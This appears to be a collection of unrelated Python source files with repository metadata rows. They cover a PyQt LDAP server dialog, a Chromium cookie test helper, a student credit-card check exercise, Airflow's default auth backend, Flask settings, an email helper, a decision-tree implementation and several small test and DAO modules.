sizePolicy.setHeightForWidth(self.serverCertGroup.sizePolicy().hasHeightForWidth())
self.serverCertGroup.setSizePolicy(sizePolicy)
self.serverCertGroup.setObjectName(_fromUtf8("serverCertGroup"))
self.gridLayout_10 = QtGui.QGridLayout(self.serverCertGroup)
self.gridLayout_10.setObjectName(_fromUtf8("gridLayout_10"))
self.validateBox = QtGui.QComboBox(self.serverCertGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.validateBox.sizePolicy().hasHeightForWidth())
self.validateBox.setSizePolicy(sizePolicy)
self.validateBox.setMinimumSize(QtCore.QSize(0, 20))
self.validateBox.setObjectName(_fromUtf8("validateBox"))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.validateBox.addItem(_fromUtf8(""))
self.gridLayout_10.addWidget(self.validateBox, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.serverCertGroup, 1, 0, 1, 1)
self.clientCertOptGroup = QtGui.QGroupBox(self.securityTab)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.clientCertOptGroup.sizePolicy().hasHeightForWidth())
self.clientCertOptGroup.setSizePolicy(sizePolicy)
self.clientCertOptGroup.setObjectName(_fromUtf8("clientCertOptGroup"))
self.gridLayout_11 = QtGui.QGridLayout(self.clientCertOptGroup)
self.gridLayout_11.setObjectName(_fromUtf8("gridLayout_11"))
self.clentCertForm = QtGui.QGridLayout()
self.clentCertForm.setObjectName(_fromUtf8("clentCertForm"))
self.useClientCertBox = QtGui.QCheckBox(self.clientCertOptGroup)
self.useClientCertBox.setEnabled(True)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.useClientCertBox.sizePolicy().hasHeightForWidth())
self.useClientCertBox.setSizePolicy(sizePolicy)
self.useClientCertBox.setMinimumSize(QtCore.QSize(0, 20))
self.useClientCertBox.setObjectName(_fromUtf8("useClientCertBox"))
self.clentCertForm.addWidget(self.useClientCertBox, 0, 0, 1, 3)
self.certFileLabel = QtGui.QLabel(self.clientCertOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.certFileLabel.sizePolicy().hasHeightForWidth())
self.certFileLabel.setSizePolicy(sizePolicy)
self.certFileLabel.setMinimumSize(QtCore.QSize(0, 20))
self.certFileLabel.setWordWrap(False)
self.certFileLabel.setObjectName(_fromUtf8("certFileLabel"))
self.clentCertForm.addWidget(self.certFileLabel, 1, 0, 1, 1)
self.certFileEdit = QtGui.QLineEdit(self.clientCertOptGroup)
self.certFileEdit.setEnabled(False)
self.certFileEdit.setMinimumSize(QtCore.QSize(0, 20))
self.certFileEdit.setObjectName(_fromUtf8("certFileEdit"))
self.clentCertForm.addWidget(self.certFileEdit, 1, 1, 1, 1)
self.certKeyfileEdit = QtGui.QLineEdit(self.clientCertOptGroup)
self.certKeyfileEdit.setEnabled(False)
self.certKeyfileEdit.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileEdit.setObjectName(_fromUtf8("certKeyfileEdit"))
self.clentCertForm.addWidget(self.certKeyfileEdit, 2, 1, 1, 1)
self.certKeyfileButton = QtGui.QToolButton(self.clientCertOptGroup)
self.certKeyfileButton.setEnabled(False)
self.certKeyfileButton.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileButton.setObjectName(_fromUtf8("certKeyfileButton"))
self.clentCertForm.addWidget(self.certKeyfileButton, 1, 2, 1, 1)
self.certFileButton = QtGui.QToolButton(self.clientCertOptGroup)
self.certFileButton.setEnabled(False)
self.certFileButton.setMinimumSize(QtCore.QSize(0, 20))
self.certFileButton.setObjectName(_fromUtf8("certFileButton"))
self.clentCertForm.addWidget(self.certFileButton, 2, 2, 1, 1)
self.certKeyfileLabel = QtGui.QLabel(self.clientCertOptGroup)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.certKeyfileLabel.sizePolicy().hasHeightForWidth())
self.certKeyfileLabel.setSizePolicy(sizePolicy)
self.certKeyfileLabel.setMinimumSize(QtCore.QSize(0, 20))
self.certKeyfileLabel.setWordWrap(False)
self.certKeyfileLabel.setObjectName(_fromUtf8("certKeyfileLabel"))
self.clentCertForm.addWidget(self.certKeyfileLabel, 2, 0, 1, 1)
self.gridLayout_11.addLayout(self.clentCertForm, 0, 0, 1, 1)
self.securityGridLayout.addWidget(self.clientCertOptGroup, 2, 0, 1, 1)
spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.securityGridLayout.addItem(spacerItem4, 3, 0, 1, 1)
self.gridLayout_4.addLayout(self.securityGridLayout, 0, 1, 2, 1)
spacerItem5 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout_4.addItem(spacerItem5, 1, 0, 1, 1)
self.tabWidget.addTab(self.securityTab, _fromUtf8(""))
self.vboxlayout.addWidget(self.splitter)
self.line = QtGui.QFrame(ServerDialogDesign)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.vboxlayout.addWidget(self.line)
self.bottomHBoxLayout = QtGui.QHBoxLayout()
self.bottomHBoxLayout.setObjectName(_fromUtf8("bottomHBoxLayout"))
spacerItem6 = QtGui.QSpacerItem(0, 0, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.bottomHBoxLayout.addItem(spacerItem6)
self.okButton = QtGui.QPushButton(ServerDialogDesign)
self.okButton.setFocusPolicy(QtCore.Qt.TabFocus)
self.okButton.setAutoDefault(True)
self.okButton.setDefault(True)
self.okButton.setFlat(False)
self.okButton.setObjectName(_fromUtf8("okButton"))
self.bottomHBoxLayout.addWidget(self.okButton)
self.applyButton = QtGui.QPushButton(ServerDialogDesign)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.applyButton.sizePolicy().hasHeightForWidth())
self.applyButton.setSizePolicy(sizePolicy)
self.applyButton.setAutoDefault(False)
self.applyButton.setObjectName(_fromUtf8("applyButton"))
self.bottomHBoxLayout.addWidget(self.applyButton)
self.cancelButton = QtGui.QPushButton(ServerDialogDesign)
self.cancelButton.setAutoDefault(False)
self.cancelButton.setObjectName(_fromUtf8("cancelButton"))
self.bottomHBoxLayout.addWidget(self.cancelButton)
self.vboxlayout.addLayout(self.bottomHBoxLayout)
self.hostLabel.setBuddy(self.hostEdit)
self.portLabel.setBuddy(self.portSpinBox)
self.mechanismLabel.setBuddy(self.mechanismBox)
self.bindAsLabel.setBuddy(self.bindAsEdit)
self.passwordLabel.setBuddy(self.passwordEdit)
self.certFileLabel.setBuddy(self.certFileEdit)
self.certKeyfileLabel.setBuddy(self.certKeyfileEdit)
self.retranslateUi(ServerDialogDesign)
self.tabWidget.setCurrentIndex(0)
QtCore.QObject.connect(self.addBaseDNButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.addBaseDN)
QtCore.QObject.connect(self.addButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.addServer)
QtCore.QObject.connect(self.applyButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.saveServerlist)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.addBaseDNButton.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.deleteBaseDNButton.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.baseDNEdit.setDisabled)
QtCore.QObject.connect(self.baseDNBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.baseDNListWidget.setDisabled)
QtCore.QObject.connect(self.bindAsEdit, QtCore.SIGNAL(_fromUtf8("returnPressed()")), ServerDialogDesign.addBaseDN)
QtCore.QObject.connect(self.cancelButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.reject)
QtCore.QObject.connect(self.certFileButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.certFileDialog)
QtCore.QObject.connect(self.certKeyfileButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.certKeyfileDialog)
QtCore.QObject.connect(self.deleteBaseDNButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.deleteBaseDN)
QtCore.QObject.connect(self.deleteButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.deleteServer)
QtCore.QObject.connect(self.okButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.accept)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certFileEdit.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certKeyfileEdit.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certFileButton.setEnabled)
QtCore.QObject.connect(self.useClientCertBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.certKeyfileButton.setEnabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.mechanismBox.setDisabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.bindAsEdit.setDisabled)
QtCore.QObject.connect(self.bindAnonBox, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.passwordEdit.setDisabled)
QtCore.QObject.connect(self.testConnectionButton, QtCore.SIGNAL(_fromUtf8("clicked()")), ServerDialogDesign.testConnection)
QtCore.QMetaObject.connectSlotsByName(ServerDialogDesign)
ServerDialogDesign.setTabOrder(self.addButton, self.deleteButton)
ServerDialogDesign.setTabOrder(self.deleteButton, self.serverListView)
ServerDialogDesign.setTabOrder(self.serverListView, self.tabWidget)
ServerDialogDesign.setTabOrder(self.tabWidget, self.hostEdit)
ServerDialogDesign.setTabOrder(self.hostEdit, self.portSpinBox)
ServerDialogDesign.setTabOrder(self.portSpinBox, self.aliasBox)
ServerDialogDesign.setTabOrder(self.aliasBox, self.baseDNBox)
ServerDialogDesign.setTabOrder(self.baseDNBox, self.baseDNEdit)
ServerDialogDesign.setTabOrder(self.baseDNEdit, self.addBaseDNButton)
ServerDialogDesign.setTabOrder(self.addBaseDNButton, self.deleteBaseDNButton)
ServerDialogDesign.setTabOrder(self.deleteBaseDNButton, self.baseDNListWidget)
ServerDialogDesign.setTabOrder(self.baseDNListWidget, self.bindAnonBox)
ServerDialogDesign.setTabOrder(self.bindAnonBox, self.mechanismBox)
ServerDialogDesign.setTabOrder(self.mechanismBox, self.bindAsEdit)
ServerDialogDesign.setTabOrder(self.bindAsEdit, self.passwordEdit)
ServerDialogDesign.setTabOrder(self.passwordEdit, self.encryptionBox)
ServerDialogDesign.setTabOrder(self.encryptionBox, self.validateBox)
ServerDialogDesign.setTabOrder(self.validateBox, self.useClientCertBox)
ServerDialogDesign.setTabOrder(self.useClientCertBox, self.certFileEdit)
ServerDialogDesign.setTabOrder(self.certFileEdit, self.certKeyfileButton)
ServerDialogDesign.setTabOrder(self.certKeyfileButton, self.certKeyfileEdit)
ServerDialogDesign.setTabOrder(self.certKeyfileEdit, self.certFileButton)
ServerDialogDesign.setTabOrder(self.certFileButton, self.okButton)
ServerDialogDesign.setTabOrder(self.okButton, self.applyButton)
ServerDialogDesign.setTabOrder(self.applyButton, self.cancelButton)
def retranslateUi(self, ServerDialogDesign):
ServerDialogDesign.setWindowTitle(QtGui.QApplication.translate("ServerDialogDesign", "Manage Server List", None, QtGui.QApplication.UnicodeUTF8))
self.addButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Add", None, QtGui.QApplication.UnicodeUTF8))
self.deleteButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Delete", None, QtGui.QApplication.UnicodeUTF8))
self.testConnectionButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Test connection", None, QtGui.QApplication.UnicodeUTF8))
self.networkGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Network options", None, QtGui.QApplication.UnicodeUTF8))
self.hostLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Host:", None, QtGui.QApplication.UnicodeUTF8))
self.portLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Port:", None, QtGui.QApplication.UnicodeUTF8))
self.LDAPGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "LDAP options", None, QtGui.QApplication.UnicodeUTF8))
self.aliasBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Follow aliases", None, QtGui.QApplication.UnicodeUTF8))
self.baseDNBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Use Base DN provided by server", None, QtGui.QApplication.UnicodeUTF8))
self.baseDNLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Custom:", None, QtGui.QApplication.UnicodeUTF8))
self.addBaseDNButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.deleteBaseDNButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.networkTab), QtGui.QApplication.translate("ServerDialogDesign", "Network", None, QtGui.QApplication.UnicodeUTF8))
self.bindOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Bind options", None, QtGui.QApplication.UnicodeUTF8))
self.bindAnonBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Anonymous bind", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Mechanism:", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "SIMPLE", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "SASL CRAM-MD5", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "SASL DIGEST-MD5", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(3, QtGui.QApplication.translate("ServerDialogDesign", "SASL EXTERNAL", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(4, QtGui.QApplication.translate("ServerDialogDesign", "SASL GSSAPI", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(5, QtGui.QApplication.translate("ServerDialogDesign", "SASL Login", None, QtGui.QApplication.UnicodeUTF8))
self.mechanismBox.setItemText(6, QtGui.QApplication.translate("ServerDialogDesign", "SASL Plain", None, QtGui.QApplication.UnicodeUTF8))
self.bindAsLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Bind as:", None, QtGui.QApplication.UnicodeUTF8))
self.passwordLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Password:", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), QtGui.QApplication.translate("ServerDialogDesign", "Authentication", None, QtGui.QApplication.UnicodeUTF8))
self.securityOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Security options", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "Unencrypted connection", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "Transport Layer Security (TLS)", None, QtGui.QApplication.UnicodeUTF8))
self.encryptionBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "Secure Socket Layer (SSL)", None, QtGui.QApplication.UnicodeUTF8))
self.serverCertGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Validate server certificate", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(0, QtGui.QApplication.translate("ServerDialogDesign", "Never", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(1, QtGui.QApplication.translate("ServerDialogDesign", "Allow", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(2, QtGui.QApplication.translate("ServerDialogDesign", "Try", None, QtGui.QApplication.UnicodeUTF8))
self.validateBox.setItemText(3, QtGui.QApplication.translate("ServerDialogDesign", "Demand", None, QtGui.QApplication.UnicodeUTF8))
self.clientCertOptGroup.setTitle(QtGui.QApplication.translate("ServerDialogDesign", "Client certificate options", None, QtGui.QApplication.UnicodeUTF8))
self.useClientCertBox.setText(QtGui.QApplication.translate("ServerDialogDesign", "Use client certificates", None, QtGui.QApplication.UnicodeUTF8))
self.certFileLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Certificate file:", None, QtGui.QApplication.UnicodeUTF8))
self.certKeyfileButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "...", None, QtGui.QApplication.UnicodeUTF8))
self.certFileButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "...", None, QtGui.QApplication.UnicodeUTF8))
self.certKeyfileLabel.setText(QtGui.QApplication.translate("ServerDialogDesign", "Certificate keyfile:", None, QtGui.QApplication.UnicodeUTF8))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.securityTab), QtGui.QApplication.translate("ServerDialogDesign", "Security", None, QtGui.QApplication.UnicodeUTF8))
self.okButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&OK", None, QtGui.QApplication.UnicodeUTF8))
self.applyButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "Apply", None, QtGui.QApplication.UnicodeUTF8))
self.cancelButton.setText(QtGui.QApplication.translate("ServerDialogDesign", "&Cancel", None, QtGui.QApplication.UnicodeUTF8))
self.cancelButton.setShortcut(QtGui.QApplication.translate("ServerDialogDesign", "Alt+C", None, QtGui.QApplication.UnicodeUTF8))
| khosrow/luma-devel | luma/base/gui/design/ServerDialogDesign.py | Python | gpl-2.0 | 36,277 | 0.003556 |
from cookies.resources.helpers import makeDropCookie, setNoCacheAndCORSHeaders
def main(request, response):
"""Respond to `/cookie/drop/secure` by dropping the two cookie set by
`setSecureTestCookies()`"""
headers = setNoCacheAndCORSHeaders(request, response)
# Expire the cookies, and return a JSON-encoded success code.
headers.append(makeDropCookie(b"alone_secure", False))
headers.append(makeDropCookie(b"alone_insecure", False))
return headers, b'{"success": true}'
| scheib/chromium | third_party/blink/web_tests/external/wpt/cookies/resources/dropSecure.py | Python | bsd-3-clause | 501 | 0.001996 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 18 16:28:59 2017
@author: hase
2. Credit Card Number Check
Suppose you have been hired by MeisterCard to write a function
which checks if a given credit card number is valid.
Your function check(card_number) should take a string card_number as input.
- First, if the string does not follow the format "#### #### #### ####", where
each # is a digit, it should return False.
- Then, if the sum of the digits is divisible by 10 (a "checksum" method),
then the procedure should return True, otherwise it should return False.
For example, if card_number is the string "9384 3495 3297 0123" then although
the format is correct, the digit’s sum is 72 so you should return False.
Hints:
- You can split a string at a specific character using the function split().
parts = my_string.split('a')
- You can test if a string contains only digits with the function isdigit().
only_digits = my_string.isdigit()
"""
# Modules
import numpy as np
# Functions
def invalid():
''' Feedback to user after an invaid input'''
print('Invalid number, please try again!')
def card():
''' Get user input with card number'''
card_num = input('Card number, #### #### #### ####? ')
if len(card_num) == 19:
sanitized = card_num.split(' ')
s = len(sanitized)
if s == 4:
i = range(s)
for i in sanitized:
if sanitized[i].isdigit():
print('Valid number!')
else: invalid()
else: invalid()
else: invalid()
return card_num
card()
| pandastrail/InfoEng | scripting/exercises/p06_2.py | Python | gpl-3.0 | 1,641 | 0.007932 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from functools import wraps
client_auth = None
def init_app(app):
pass
def requires_authentication(function):
@wraps(function)
def decorated(*args, **kwargs):
return function(*args, **kwargs)
return decorated
| danielvdende/incubator-airflow | airflow/api/auth/backend/default.py | Python | apache-2.0 | 1,051 | 0 |
import os
# ***********************************
# Settings common to all environments
# ***********************************
# Application settings
APP_NAME = "Game Valet"
APP_SYSTEM_ERROR_SUBJECT_LINE = APP_NAME + " system error"
# Flask settings
CSRF_ENABLED = True
# Flask-User settings
USER_APP_NAME = APP_NAME
USER_ENABLE_CHANGE_PASSWORD = True # Allow users to change their password
USER_ENABLE_CHANGE_USERNAME = False # Allow users to change their username
USER_ENABLE_CONFIRM_EMAIL = True # Force users to confirm their email
USER_ENABLE_FORGOT_PASSWORD = True # Allow users to reset their passwords
USER_ENABLE_EMAIL = True # Register with Email
USER_ENABLE_REGISTRATION = True # Allow new users to register
USER_ENABLE_RETYPE_PASSWORD = True # Prompt for `retype password` in:
USER_ENABLE_USERNAME = False # Register and Login with username
USER_AFTER_LOGIN_ENDPOINT = 'core.user_page'
USER_AFTER_LOGOUT_ENDPOINT = 'core.home_page'
| teirce/game-valet | app/startup/common_settings.py | Python | bsd-2-clause | 957 | 0.00209 |
from django.template.loader import get_template
from django.template import Context
from django.core.mail import EmailMultiAlternatives
from django.conf import settings
def generate_message_from_template(template, context):
context["STATIC_URL"] = settings.STATIC_URL
# Mandrill is set up to inline the CSS and generate a plaintext copy.
html_message = get_template(template).render(Context(context)).strip()
context["plaintext"] = True
plaintext_message = get_template(template).render(Context(context)).strip()
return html_message, plaintext_message
def send_email(recipient_list, subject, html_message, plaintext_message=None):
if type(recipient_list) is not list:
recipient_list = [recipient_list]
email = EmailMultiAlternatives(subject=subject, body=plaintext_message, from_email="tapiriik <mailer@tapiriik.com>", to=recipient_list, headers={"Reply-To": "contact@tapiriik.com"})
email.attach_alternative(html_message, "text/html")
email.send() | dmschreiber/tapiriik | tapiriik/web/email.py | Python | apache-2.0 | 963 | 0.015576 |
import matplotlib.pyplot as plt
import operator
from math import log
import pickle
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCounts = {}
for fv in dataSet:
currentLabel = fv[-1]
if currentLabel not in labelCounts.keys():
labelCounts[currentLabel] = 0
labelCounts[currentLabel] += 1
shannonEnt = 0.0
for key in labelCounts:
prob = float(labelCounts[key]) / numEntries
shannonEnt -= prob * log(prob, 2)
return shannonEnt
def createDataSet():
dataSet = [[1, 1, 'yes'], [1, 1, 'yes'],
[1, 0, 'no'], [0, 1, 'no'], [0, 1, 'no']]
labels = ['no surfacing', 'flippers']
return dataSet, labels
def splitDataSet(dataSet, axis, value):
retDataSet = []
for featVec in dataSet:
if featVec[axis] == value:
reducedFeatVec = featVec[:axis]
reducedFeatVec.extend(featVec[axis + 1:])
retDataSet.append(reducedFeatVec)
return retDataSet
def chooseBestFeatureToSplit(dataSet):
numFeatures = len(dataSet[0]) - 1
baseEntropy = calcShannonEnt(dataSet)
bestInfoGain = 0.0
bestFeature = -1
for i in range(numFeatures):
featList = [example[i] for example in dataSet]
uniqueVals = set(featList)
newEntropy = 0.0
for value in uniqueVals:
subDataSet = splitDataSet(dataSet, i, value)
prob = len(subDataSet) / float(len(dataSet))
newEntropy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntropy - newEntropy
if(infoGain > bestInfoGain):
bestInfoGain = infoGain
bestFeature = i
return bestFeature
def majorityCnt(classList):
classCount = {}
for vote in classList:
if vote not in classCount.keys():
classCount[vote] = 0
classCount[vote] += 1
sortedClassCount = sorted(
classCount.items(), key=operator.itemgetter(1), reverse=True)
return sortedClassCount[0][0]
def createTree(dataSet, labels):
classList = [example[-1] for example in dataSet]
# print('classList.count is :',classList.count(classList[0]))
# print('len(classList) is :',len(classList))
if classList.count(classList[0]) == len(classList):
return classList[0]
# print('len(dataSet[0] is :',len(dataSet[0]))
if len(dataSet[0]) == 1:
return majorityCnt(classList)
bestFeat = chooseBestFeatureToSplit(dataSet)
# print('bestFeat is : ',bestFeat)
bestFeatLabel = labels[bestFeat]
# print('bestFeatLabel is :',bestFeatLabel)
myTree = {bestFeatLabel: {}}
print
del(labels[bestFeat])
featValues = [example[bestFeat] for example in dataSet]
uniqueVals = set(featValues)
for value in uniqueVals:
subLabels = labels[:]
myTree[bestFeatLabel][value] = createTree(
splitDataSet(dataSet, bestFeat, value), subLabels)
return myTree
def classify(inputTree, featLabels, testVec):
firstStr = list(inputTree.keys())[0]
# print('firstStr is : ',firstStr)
secondDict = inputTree[firstStr]
# print('secondDict is :',secondDict)
featIndex = featLabels.index(firstStr)
# print('featIndex is :',featIndex)
# print(type(featIndex))
for key in secondDict.keys():
# print(key)
# print('testVec is :',testVec[featIndex])
# print(type(key))
# print(type(testVec[featIndex]))
if testVec[featIndex] == key:
if type(secondDict[key]).__name__ == 'dict':
classLabel = classify(secondDict[key], featLabels, testVec)
else:
classLabel = secondDict[key]
return classLabel
def storeTree(inputTree, filename):
fw = open(filename, 'wb')
pickle.dump(inputTree, fw)
fw.close()
def grabTree(filename):
fr = open(filename, 'rb')
return pickle.load(fr)
| JNero/Machine-Learning-in-action | DicisionTree/trees.py | Python | apache-2.0 | 3,852 | 0.003375 |
#!/usr/bin/env python
#
# Copyright 2005,2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, comedi
class test_comedi(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test_000_nop(self):
"""Just see if we can import the module...
They may not have COMEDI library, etc. Don't try to run anything"""
pass
if __name__ == '__main__':
gr_unittest.run(test_comedi, "test_comedi.xml")
| iohannez/gnuradio | gr-comedi/python/comedi/qa_comedi.py | Python | gpl-3.0 | 1,256 | 0.001592 |
#
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
from collections import OrderedDict
from sqlalchemy import inspect
from sqlalchemy.engine import ResultProxy
from rdr_service.dao.base_dao import UpsertableDao
from rdr_service.model.resource_data import ResourceData
from rdr_service.resource.fields import EnumString, EnumInteger
class ResourceDataDao(UpsertableDao):
def __init__(self, backup=False):
"""
:param backup: Use backup readonly database connection.
"""
super().__init__(ResourceData, backup=backup)
def to_resource_dict(self, obj, schema=None, result_proxy=None):
"""
Dump a sqlalchemy model or query result object to python dict.
:param obj: SqlAlchemy Query Result object or Row Proxy object.
:param schema: Resource schema object.
:param result_proxy: ResultProxy object if obj=RowProxy object.
:return: ordered dict
"""
if not obj:
return None
data = OrderedDict()
# Get the list of columns returned in the query.
if result_proxy and isinstance(result_proxy, ResultProxy): # this is a ResultProxy object
columns = list()
for column in result_proxy.cursor.description:
columns.append(column[0])
elif hasattr(obj, "_fields"): # This is a custom query result object.
columns = obj._fields
elif hasattr(obj, '_keymap'): # RowProxy
columns = obj._keymap
else:
mapper = inspect(obj) # Simple model object
columns = mapper.attrs
for column in columns:
key = str(column.key) if hasattr(column, "key") else column
if not isinstance(key, str):
# logging.warning('bad column key value [{0}], unable to lookup result column value.'.format(column))
continue
value = getattr(obj, key)
int_id_value = None
if schema:
# Check for Enum column type and convert to Enum if needed.
_field = schema.get_field(key)
if type(_field) == EnumString:
value = str(_field.enum(value))
_id_field = schema.get_field(key + '_id')
if _id_field and type(_id_field) == EnumInteger:
int_id_value = int(_field.enum(value))
elif type(_field) == EnumInteger:
value = int(_field.enum(value))
data[key] = value
# Automatically generate an integer field for enum/string fields that have a paired _id integer field
# E.g.: status/status_id, code_type/code_type_id, etc.
if int_id_value:
data[key + '_id'] = int_id_value
return data
| all-of-us/raw-data-repository | rdr_service/dao/resource_dao.py | Python | bsd-3-clause | 2,900 | 0.001034 |
import unittest
from datetime import datetime
import numpy as np
import pandas as pd
from excel_helper.helper import DataSeriesLoader
